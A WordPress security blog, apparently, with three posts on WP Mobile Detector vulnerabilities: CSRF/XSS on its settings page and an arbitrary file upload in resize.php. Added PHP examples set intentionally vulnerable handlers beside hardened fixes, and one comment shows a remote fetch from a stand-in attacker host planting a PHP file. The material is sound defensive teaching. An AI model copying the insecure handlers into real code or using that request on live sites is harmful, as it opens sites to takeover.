22 Jun 2016

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in WP Mobile Detector

As we continue looking at ways we can improve the security of WordPress plugins, one of the things we are trying is checking over plugins for which we have recently added new vulnerabilities to our data set, to see if we can find any other obvious vulnerabilities. The second we have spotted is in the plugin WP Mobile Detector. Unlike the arbitrary file upload vulnerability we spotted after someone was looking to exploit it on this website, this cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability on the settings page for the plugin is unlikely to be exploited, since it requires getting a logged-in administrator to visit an attacker-controlled page.

The CSRF portion of this is due to a lack of a nonce check on the page. [Read more]
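To show the pattern the post is pointing at, here is an added illustration (not code from WP Mobile Detector or from the post) of a WordPress settings handler written without a nonce check beside a hardened version. The option name, field name and nonce action are hypothetical; the WordPress functions used (check_admin_referer, wp_nonce_field, esc_attr, esc_url_raw, current_user_can) are the standard core APIs.

```php
<?php
// Added illustration, not the plugin's code. Hypothetical option name:
// 'wpmd_demo_redirect_url'; hypothetical nonce action 'wpmd_demo_save_settings'.

// Vulnerable shape: any POST that reaches this admin page is processed, so a
// form on another site that auto-submits to this URL gets the changes saved
// with the privileges of whichever administrator happens to be logged in
// (CSRF). Echoing the stored value back unescaped turns the same request
// into stored XSS on the settings page.
function wpmd_demo_settings_page_insecure() {
    if ( isset( $_POST['redirect_url'] ) ) {
        update_option( 'wpmd_demo_redirect_url', $_POST['redirect_url'] );
    }
    $value = get_option( 'wpmd_demo_redirect_url', '' );
    echo '<form method="post">';
    echo '<input type="text" name="redirect_url" value="' . $value . '">';
    echo '<input type="submit" value="Save">';
    echo '</form>';
}

// Hardened shape: explicit capability check, a nonce tied to this action and
// verified before anything is saved, input normalised before storage, and
// output escaped for the HTML attribute context it is printed in.
function wpmd_demo_settings_page_secure() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    if ( isset( $_POST['redirect_url'] ) ) {
        // check_admin_referer() calls wp_die() when the nonce field is
        // missing or does not verify, so a cross-site form submission never
        // reaches update_option().
        check_admin_referer( 'wpmd_demo_save_settings', 'wpmd_demo_nonce' );
        update_option(
            'wpmd_demo_redirect_url',
            esc_url_raw( wp_unslash( $_POST['redirect_url'] ) )
        );
    }
    $value = get_option( 'wpmd_demo_redirect_url', '' );
    echo '<form method="post">';
    // Emits a hidden input named wpmd_demo_nonce whose value is bound to the
    // current user and session and expires after roughly a day.
    wp_nonce_field( 'wpmd_demo_save_settings', 'wpmd_demo_nonce' );
    echo '<input type="text" name="redirect_url" value="' . esc_attr( $value ) . '">';
    echo '<input type="submit" value="Save">';
    echo '</form>';
}
```

The nonce is what defeats the CSRF: an attacker's page cannot read the logged-in administrator's nonce value, so a forged POST fails verification. The escaping is a separate fix for the XSS half; a nonce alone would still leave the stored value rendered unescaped for anyone who could legitimately save it.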

20 Jun 2016

Press Coverage Seems To Increase Hacker Interest In WordPress Plugin Vulnerability

When it comes to the discussion of WordPress security, one thing that stands out for us is how much of what is being said seems to be, at best, not backed by factual information, and in too many cases seems to be backed by outright falsehoods. That makes gathering and analyzing data on security issues a much needed activity.

Recently we spotted what looked to be an attempt to exploit a vulnerability in the plugin WP Mobile Detector, a plugin with 10,000+ active installs according to wordpress.org, and we quickly found an arbitrary file upload vulnerability in the relevant file in the plugin, which turned out to be what was being exploited. After the vulnerability received a fair amount of press coverage we saw more requests that looked to be part of attempts to exploit the plugin. Now that it has been three weeks since this started, we thought it would be a good time to take a closer look at what impact that coverage actually had. [Read more]

31 May 2016

Arbitrary File Upload Vulnerability in WP Mobile Detector

A few days ago we saw a HEAD request for the file /blog/wp-content/plugins/wp-mobile-detector/resize.php, which is a file in the plugin WP Mobile Detector. Since we don’t have that plugin installed, the most likely explanation was that someone was checking for the existence of the file before trying to exploit a vulnerability in the plugin. Looking around we couldn’t find any public disclosure of a vulnerability involving that particular file, but a quick look at the file showed that the plugin has an arbitrary file upload vulnerability. The severity of the vulnerability is lessened by the fact that it requires the server to have an option enabled that itself introduces the potential for security risks like this one.

The code in the file first checks if a file exists based on the GET or POST value “src”: [Read more]
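As an added illustration (not the plugin's resize.php and not code from the post), the following shows the general shape of a resize/cache script that takes a user-supplied "src" value, in an unsafe form beside a hardened one. The post does not name the server option it refers to; the example assumes it is PHP's allow_url_fopen, which is the setting that lets functions such as file_get_contents read http:// URLs. All paths, function names and the attacker host are hypothetical.

```php
<?php
// Added illustration, not the plugin's code. Assumes the server option the
// post refers to is allow_url_fopen (the post does not name it).

// Unsafe shape: "src" comes straight from the request, is used both as the
// thing to fetch and (via basename) as the cache filename, and nothing limits
// it to local image files. With allow_url_fopen=On, file_get_contents() will
// happily fetch src=http://attacker.example/x.php and write x.php into a
// web-accessible cache directory, which is an arbitrary file upload.
function cache_source_insecure( $src, $cache_dir ) {
    $target = rtrim( $cache_dir, '/' ) . '/' . basename( $src );
    if ( ! file_exists( $target ) ) {
        file_put_contents( $target, file_get_contents( $src ) );
    }
    return $target;
}

// Hardened shape: refuse anything with a URL scheme or stream wrapper, only
// accept paths that resolve inside the uploads directory, only accept real
// image files, and derive the cache filename from the content rather than
// from the request. Returns false on any rejection.
function cache_source_secure( $src, $cache_dir, $uploads_dir ) {
    // Reject http://, https://, php://, data://, ftp:// and friends outright.
    if ( preg_match( '#^[a-z][a-z0-9+.\-]*://#i', $src ) ) {
        return false;
    }
    // Resolve symlinks and "../" segments, then confine to the uploads tree.
    $base = realpath( $uploads_dir );
    $real = realpath( rtrim( $uploads_dir, '/' ) . '/' . ltrim( $src, '/' ) );
    if ( $base === false || $real === false ) {
        return false;
    }
    if ( strpos( $real, $base . DIRECTORY_SEPARATOR ) !== 0 || ! is_file( $real ) ) {
        return false;
    }
    // Allow-list by extension, then confirm the bytes really are an image so
    // a PHP file renamed to .jpg is still rejected.
    $ext = strtolower( pathinfo( $real, PATHINFO_EXTENSION ) );
    if ( ! in_array( $ext, array( 'jpg', 'jpeg', 'png', 'gif' ), true ) ) {
        return false;
    }
    if ( @getimagesize( $real ) === false ) {
        return false;
    }
    // Content-derived name: the request cannot choose what lands in cache/.
    $target = rtrim( $cache_dir, '/' ) . '/' . sha1_file( $real ) . '.' . $ext;
    if ( ! file_exists( $target ) ) {
        copy( $real, $target );
    }
    return $target;
}
```

The existence check in the unsafe version only asks whether the cached copy is already present; it says nothing about where the content is coming from, which is why a remote URL passes through untouched. Separately, the cache directory should not be executable by the web server (a deny rule for .php in that directory, or a location outside the document root) so that even a successful write does not become code execution.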